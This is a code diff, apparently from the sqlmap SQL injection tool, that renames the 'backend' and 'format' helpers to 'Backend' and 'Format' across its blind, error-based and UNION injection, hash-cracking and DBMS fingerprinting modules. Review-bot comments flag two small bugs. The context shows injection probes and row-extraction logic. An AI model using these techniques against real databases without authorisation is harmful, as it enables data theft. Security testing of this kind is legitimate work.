+++ b/lib/techniques/blind/inference.py
@@ -12,7 +12,7 @@ import time
import traceback
from lib.core.agent import agent
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import dataToSessionFile
from lib.core.common import dataToStdout
from lib.core.common import decodeIntToUnicode
@@ -75,7 +75,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
elif ( isinstance(lastChar, basestring) and lastChar.isdigit() ) or isinstance(lastChar, int):
lastChar = int(lastChar)
- if backend.getDbms():
+ if Backend.getDbms():
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
@@ -125,7 +125,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
hintlock.release()
if hintValue is not None and len(hintValue) >= idx:
- if backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB):
+ if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB):
posValue = hintValue[idx-1]
else:
posValue = ord(hintValue[idx-1])
@@ -459,7 +459,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# check it via equal against the substring-query output
if commonPattern is not None:
# Substring-query containing equals commonPattern
- subquery = queries[backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern))
+ subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern))
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
query = agent.suffixQuery(query)
diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py
index 3f3e4ef00..b0cd102af 100644
--- a/lib/techniques/brute/use.py
+++ b/lib/techniques/brute/use.py
@@ -15,7 +15,7 @@ from lib.core.common import dataToSessionFile
from lib.core.common import dataToStdout
from lib.core.common import filterListValue
from lib.core.common import getFileItems
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getPageTextWordsSet
from lib.core.common import popValue
from lib.core.common import pushValue
@@ -32,7 +32,7 @@ from lib.core.session import safeFormatString
from lib.request import inject
def tableExists(tableFile, regex=None):
- tables = getFileItems(tableFile, lowercase=backend.getIdentifiedDbms() in (DBMS.ACCESS), unique=True)
+ tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS), unique=True)
retVal = []
infoMsg = "checking table existence using items from '%s'" % tableFile
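Review bot: `(DBMS.ACCESS)` in the `lowercase=` argument is a parenthesised value, not a one-element tuple, so `in` is applied to `DBMS.ACCESS` itself. If that constant is a string (its definition is not visible here), this becomes a substring test, and it would raise TypeError should `Backend.getIdentifiedDbms()` ever return None. An equality test says what is meant: `lowercase=Backend.getIdentifiedDbms() == DBMS.ACCESS`, or `in (DBMS.ACCESS,)` if more entries are expected later. `tableExists` continues past the end of this hunk.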
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index cb6b32823..edecf9127 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -14,7 +14,7 @@ from lib.core.agent import agent
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToSessionFile
from lib.core.common import extractRegexResult
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import initTechnique
from lib.core.common import isNumPosStrValue
from lib.core.common import randomInt
@@ -40,7 +40,7 @@ def __oneShotErrorUse(expression, field):
check = "%s(?P.*?)%s" % (kb.misc.start, kb.misc.stop)
nulledCastedField = agent.nullAndCastField(field)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
# Fix for MySQL odd behaviour ('Subquery returns more than 1 row')
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))")
@@ -143,14 +143,14 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
# entry per time
# NOTE: I assume that only queries that get data from a table can
# return multiple entries
- if " FROM " in expression.upper() and ((backend.getIdentifiedDbms() not in FROM_TABLE) or (backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]))) and "EXISTS(" not in expression.upper():
- limitRegExp = re.search(queries[backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
+ if " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_TABLE) or (Backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]))) and "EXISTS(" not in expression.upper():
+ limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
- if limitRegExp or (backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -158,10 +158,10 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if limitRegExp:
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -173,7 +173,7 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
stopLimit = int(topLimit.group(1))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
limitCond = False
else:
limitCond = True
@@ -187,12 +187,12 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
# From now on we need only the expression until the " LIMIT "
# (or similar, depending on the back-end DBMS) word
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
stopLimit += startLimit
- untilLimitChar = expression.index(queries[backend.getIdentifiedDbms()].limitstring.query)
+ untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
expression = expression[:untilLimitChar]
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
stopLimit += startLimit
elif dump:
if conf.limitStart:
@@ -201,14 +201,14 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
stopLimit = conf.limitStop
if not stopLimit or stopLimit <= 1:
- if backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
+ if Backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
test = False
else:
test = True
if test:
# Count the number of SQL query entries output
- countFirstField = queries[backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
+ countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
countedExpression = expression.replace(expressionFields, countFirstField, 1)
if re.search(" ORDER BY ", expression, re.I):
diff --git a/lib/techniques/inband/union/test.py b/lib/techniques/inband/union/test.py
index 3a0a1fac3..318fd3c64 100644
--- a/lib/techniques/inband/union/test.py
+++ b/lib/techniques/inband/union/test.py
@@ -13,7 +13,7 @@ import time
from lib.core.agent import agent
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getUnicode
from lib.core.common import parseUnionPage
@@ -102,14 +102,14 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)
for count in range(conf.uColsStart, conf.uColsStop+1):
- if backend.getIdentifiedDbms() in FROM_TABLE and query.endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
- query = query[:-len(FROM_TABLE[backend.getIdentifiedDbms()])]
+ if Backend.getIdentifiedDbms() in FROM_TABLE and query.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
+ query = query[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]
if count:
query += ", %s" % conf.uChar
- if backend.getIdentifiedDbms() in FROM_TABLE:
- query += FROM_TABLE[backend.getIdentifiedDbms()]
+ if Backend.getIdentifiedDbms() in FROM_TABLE:
+ query += FROM_TABLE[Backend.getIdentifiedDbms()]
status = "%d/%d" % (count, conf.uColsStop)
debugMsg = "testing %s columns (%d%%)" % (status, round(100.0*count/conf.uColsStop))
diff --git a/lib/techniques/inband/union/use.py b/lib/techniques/inband/union/use.py
index 5019399d7..24f1b40ce 100644
--- a/lib/techniques/inband/union/use.py
+++ b/lib/techniques/inband/union/use.py
@@ -12,7 +12,7 @@ import time
from lib.core.agent import agent
from lib.core.common import calculateDeltaSeconds
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getUnicode
from lib.core.common import initTechnique
from lib.core.common import isNumPosStrValue
@@ -101,14 +101,14 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
# entry per time
# NOTE: I assume that only queries that get data from a table can
# return multiple entries
- if " FROM " in expression.upper() and ((backend.getIdentifiedDbms() not in FROM_TABLE) or (backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]))) and "EXISTS(" not in expression.upper():
- limitRegExp = re.search(queries[backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
+ if " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_TABLE) or (Backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]))) and "EXISTS(" not in expression.upper():
+ limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
- if limitRegExp or (backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -116,10 +116,10 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if limitRegExp:
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -131,7 +131,7 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
stopLimit = int(topLimit.group(1))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
limitCond = False
else:
limitCond = True
@@ -145,12 +145,12 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
# From now on we need only the expression until the " LIMIT "
# (or similar, depending on the back-end DBMS) word
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
stopLimit += startLimit
- untilLimitChar = expression.index(queries[backend.getIdentifiedDbms()].limitstring.query)
+ untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
expression = expression[:untilLimitChar]
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
stopLimit += startLimit
elif dump:
if conf.limitStart:
@@ -159,14 +159,14 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
stopLimit = conf.limitStop
if not stopLimit or stopLimit <= 1:
- if backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
+ if Backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
test = False
else:
test = True
if test:
# Count the number of SQL query entries output
- countFirstField = queries[backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
+ countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
countedExpression = origExpr.replace(expressionFields, countFirstField, 1)
if re.search(" ORDER BY ", expression, re.I):
@@ -214,9 +214,9 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
try:
for num in xrange(startLimit, stopLimit):
- if backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
field = expressionFieldsList[0]
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
field = expressionFieldsList
else:
field = None
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index cf91748be..32fad04a1 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -22,7 +22,7 @@ from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import getCompiledRegex
from lib.core.common import getFileItems
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getPublicTypeMembers
from lib.core.common import getUnicode
from lib.core.common import paths
@@ -270,9 +270,9 @@ def hashRecognition(value):
if value:
for name, regex in getPublicTypeMembers(HASH):
# Hashes for Oracle and old MySQL look the same hence these checks
- if backend.getIdentifiedDbms() == DBMS.ORACLE and regex == HASH.MYSQL_OLD:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE and regex == HASH.MYSQL_OLD:
continue
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and regex == HASH.ORACLE_OLD:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and regex == HASH.ORACLE_OLD:
continue
elif getCompiledRegex(regex).match(value):
retVal = regex
@@ -454,7 +454,7 @@ def dictionaryAttack(attack_dict):
clearConsoleLine()
if len(hash_regexes) == 0:
- warnMsg = "unknown hash format. "
+ warnMsg = "unknown hash Format. "
warnMsg += "Please report by e-mail to sqlmap-users@lists.sourceforge.net."
logger.warn(warnMsg)
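Review bot: The `format` → `Format` rename has leaked into a runtime string in this hunk. The new line `warnMsg = "unknown hash Format. "` should stay `warnMsg = "unknown hash format. "`, because "format" here is an English word in the operator-facing warning, not a reference to the `Format` class imported from `lib.core.common`. This looks like a textual search-and-replace, so the same thing may have happened in other comments, docstrings, URLs or messages touched by this commit; it is worth checking every `Format` that is not followed by an attribute access or preceded by `import`. The body of `dictionaryAttack` continues outside this hunk, so only this one line can be confirmed from here.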
diff --git a/lib/utils/resume.py b/lib/utils/resume.py
index 612647603..099bf457a 100644
--- a/lib/utils/resume.py
+++ b/lib/utils/resume.py
@@ -13,7 +13,7 @@ import time
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToSessionFile
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import safeStringFormat
from lib.core.common import randomStr
from lib.core.common import replaceNewlineTabs
@@ -35,7 +35,7 @@ def queryOutputLength(expression, payload):
Returns the query output length.
"""
- lengthQuery = queries[backend.getIdentifiedDbms()].length.query
+ lengthQuery = queries[Backend.getIdentifiedDbms()].length.query
select = re.search("\ASELECT\s+", expression, re.I)
selectTopExpr = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I)
selectDistinctExpr = re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I)
@@ -61,7 +61,7 @@ def queryOutputLength(expression, payload):
if selectDistinctExpr:
lengthExpr = "SELECT %s FROM (%s)" % (lengthQuery % regExpr, expression)
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
lengthExpr += " AS %s" % randomStr(lowercase=True)
elif select:
lengthExpr = expression.replace(regExpr, lengthQuery % regExpr, 1)
@@ -146,10 +146,10 @@ def resume(expression, payload):
if not payload:
return None
- if not backend.getIdentifiedDbms():
+ if not Backend.getIdentifiedDbms():
return None
- substringQuery = queries[backend.getIdentifiedDbms()].substring.query
+ substringQuery = queries[Backend.getIdentifiedDbms()].substring.query
select = re.search("\ASELECT ", expression, re.I)
_, length, regExpr = queryOutputLength(expression, payload)
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index cb460188b..a006423f9 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getCurrentThreadData
from lib.core.common import randomInt
from lib.core.common import randomStr
@@ -38,9 +38,9 @@ class Fingerprint(GenericFingerprint):
retVal = None
table = None
- if backend.isVersionWithin(("97", "2000")):
+ if Backend.isVersionWithin(("97", "2000")):
table = "MSysAccessObjects"
- elif backend.isVersionWithin(("2002-2003", "2007")):
+ elif Backend.isVersionWithin(("2002-2003", "2007")):
table = "MSysAccessStorage"
if table is not None:
@@ -115,13 +115,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -132,7 +132,7 @@ class Fingerprint(GenericFingerprint):
value += DBMS.ACCESS
return value
- actVer = format.getDbms() + " (%s)" % (self.__sandBoxCheck())
+ actVer = Format.getDbms() + " (%s)" % (self.__sandBoxCheck())
blank = " " * 15
value += "active fingerprint: %s" % actVer
@@ -142,10 +142,10 @@ class Fingerprint(GenericFingerprint):
if re.search("-log$", kb.data.banner):
banVer += ", logging enabled"
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -155,7 +155,7 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(ACCESS_ALIASES) or conf.dbms in ACCESS_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or conf.dbms in ACCESS_ALIASES):
setDbms(DBMS.ACCESS)
return True
@@ -187,7 +187,7 @@ class Fingerprint(GenericFingerprint):
version = self.__sysTablesCheck()
if version is not None:
- backend.setVersion(version)
+ Backend.setVersion(version)
return True
else:
diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py
index 20cef4513..f49d3fc7e 100644
--- a/plugins/dbms/firebird/fingerprint.py
+++ b/plugins/dbms/firebird/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.common import randomRange
@@ -34,25 +34,25 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
- actVer = format.getDbms()
+ actVer = Format.getDbms()
if not conf.extensiveFp:
value += actVer
return value
- actVer = format.getDbms() + " (%s)" % (self.__dialectCheck())
+ actVer = Format.getDbms() + " (%s)" % (self.__dialectCheck())
blank = " " * 15
value += "active fingerprint: %s" % actVer
@@ -62,10 +62,10 @@ class Fingerprint(GenericFingerprint):
if re.search("-log$", kb.data.banner):
banVer += ", logging enabled"
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -101,23 +101,23 @@ class Fingerprint(GenericFingerprint):
def __dialectCheck(self):
retVal = None
- if backend.getIdentifiedDbms():
+ if Backend.getIdentifiedDbms():
result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
retVal = "dialect 3" if result else "dialect 1"
return retVal
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(FIREBIRD_ALIASES) \
- or conf.dbms in FIREBIRD_ALIASES) and backend.getVersion() and \
- backend.getVersion() != UNKNOWN_DBMS_VERSION:
- v = backend.getVersion().replace(">", "")
+ if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \
+ or conf.dbms in FIREBIRD_ALIASES) and Backend.getVersion() and \
+ Backend.getVersion() != UNKNOWN_DBMS_VERSION:
+ v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
- backend.setVersion(v)
+ Backend.setVersion(v)
- setDbms("%s %s" % (DBMS.FIREBIRD, backend.getVersion()))
+ setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion()))
self.getBanner()
@@ -149,7 +149,7 @@ class Fingerprint(GenericFingerprint):
version = self.__sysTablesCheck()
if version is not None:
- backend.setVersion(version)
+ Backend.setVersion(version)
setDbms("%s %s" % (DBMS.FIREBIRD, version))
self.getBanner()
diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py
index cfbd4348a..6a6ca0035 100644
--- a/plugins/dbms/maxdb/fingerprint.py
+++ b/plugins/dbms/maxdb/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import randomInt
from lib.core.common import randomRange
from lib.core.data import conf
@@ -66,13 +66,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -84,14 +84,14 @@ class Fingerprint(GenericFingerprint):
value += DBMS.MAXDB
return value
- actVer = format.getDbms() + " (%s)" % self.__versionCheck()
+ actVer = Format.getDbms() + " (%s)" % self.__versionCheck()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
value += "\n%sbanner parsing fingerprint: -" % blank
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -99,7 +99,7 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(MAXDB_ALIASES) or conf.dbms in MAXDB_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or conf.dbms in MAXDB_ALIASES):
setDbms(DBMS.MAXDB)
self.getBanner()
diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index 460cc6ab6..a6a93044f 100644
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -9,7 +9,7 @@ See the file 'doc/COPYING' for copying permission
from lib.core.agent import agent
from lib.core.common import arrayizeValue
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
@@ -41,7 +41,7 @@ class Enumeration(GenericEnumeration):
infoMsg += " for database '%s'" % conf.db
logger.info(infoMsg)
- rootQuery = queries[backend.getIdentifiedDbms()].tables
+ rootQuery = queries[Backend.getIdentifiedDbms()].tables
if not conf.db:
if not len(kb.data.cachedDbs):
@@ -111,7 +111,7 @@ class Enumeration(GenericEnumeration):
return kb.data.cachedTables
def searchTable(self):
- rootQuery = queries[backend.getIdentifiedDbms()].search_table
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_table
foundTbls = {}
tblList = conf.tbl.split(",")
tblCond = rootQuery.inband.condition
@@ -198,7 +198,7 @@ class Enumeration(GenericEnumeration):
return foundTbls
def searchColumn(self):
- rootQuery = queries[backend.getIdentifiedDbms()].search_column
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_column
foundCols = {}
dbs = {}
colList = conf.col.split(",")
diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py
index 6894ca14d..551b7e610 100644
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -8,8 +8,8 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.data import conf
@@ -30,19 +30,19 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
- actVer = format.getDbms()
+ actVer = Format.getDbms()
if not conf.extensiveFp:
value += actVer
@@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint):
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -71,10 +71,10 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(MSSQL_ALIASES) \
- or conf.dbms in MSSQL_ALIASES) and backend.getVersion() and \
- backend.getVersion().isdigit():
- setDbms("%s %s" % (DBMS.MSSQL, backend.getVersion()))
+ if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \
+ or conf.dbms in MSSQL_ALIASES) and Backend.getVersion() and \
+ Backend.getVersion().isdigit():
+ setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
self.getBanner()
@@ -103,10 +103,10 @@ class Fingerprint(GenericFingerprint):
result = inject.checkBooleanExpression(check)
if result:
- backend.setVersion(version)
+ Backend.setVersion(version)
- if backend.getVersion():
- setDbms("%s %s" % (DBMS.MSSQL, backend.getVersion()))
+ if Backend.getVersion():
